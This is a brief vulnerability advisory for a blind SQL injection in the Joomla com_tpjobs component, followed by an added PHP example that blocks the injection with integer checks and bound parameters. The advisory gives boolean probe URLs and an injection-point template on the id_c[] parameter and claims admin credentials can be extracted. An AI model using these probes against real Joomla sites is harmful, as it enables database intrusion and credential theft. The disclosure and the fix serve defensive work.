Joomla Component com_tpjobs Blind SQL injection Vulnerability

2014-07-01T00:00:00
ID SSV:67383
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

<------------------- header data start ------------------- >

Joomla Component com_tpjobs Blind SQL injection Vulnerability

author : FL0RiX

Name : com_tpjobs

Bug Type : (Blind) SQL Injection

Infection : Admin login credentials can be obtained.

Demo Vuln. :

TRUE(+) » http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=1

FALSE(-) » http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=0

Bug Fix Advice : Malicious characters should be filtered.

< ------------------- header data end ------------------- >

< -- bug code start -- >

path/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=[SQL INJ.]

< -- bug code end -- >
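
One way to apply the Bug Fix Advice to the id_c[] parameter, as an added example that is not taken from the advisory or from the com_tpjobs source: accept only decimal integers and bind them as query parameters. The resumes table, its columns and the function names are assumptions, and the sample rows are constructed.

```php
<?php
// Added example; table, columns and function names are hypothetical,
// not taken from the com_tpjobs source.

// Keep only plain decimal integers. "1 and 1=1" is dropped rather than
// cast to 1, so both of the advisory's test values are treated alike.
function clean_id_list($raw): array
{
    if (!is_array($raw)) {
        return [];
    }
    $ids = [];
    foreach ($raw as $value) {
        if (is_string($value) && ctype_digit($value) && strlen($value) <= 9) {
            $ids[] = (int) $value;
        }
    }
    return array_values(array_unique($ids));
}

// Look up rows by category id using bound integer parameters only.
function search_by_categories(PDO $db, $rawIds): array
{
    $ids = clean_id_list($rawIds);
    if ($ids === []) {
        return []; // nothing valid was supplied: no query is built
    }
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT id, title FROM resumes WHERE id_category IN ($marks)");
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE resumes (id INTEGER PRIMARY KEY, title TEXT, id_category INTEGER)');
$db->exec("INSERT INTO resumes (title, id_category) VALUES ('Welder', 1), ('Nurse', 2)");

// The two id_c[] values from the advisory, then a legitimate value.
foreach (['1 and 1=1', '1 and 1=0', '1'] as $input) {
    $rows = search_by_categories($db, [$input]);
    printf("%-10s -> %d row(s)\n", $input, count($rows));
}
```

Both demo values are rejected before any SQL is built, so the TRUE/FALSE response difference the advisory relies on disappears, while a plain integer still matches its category.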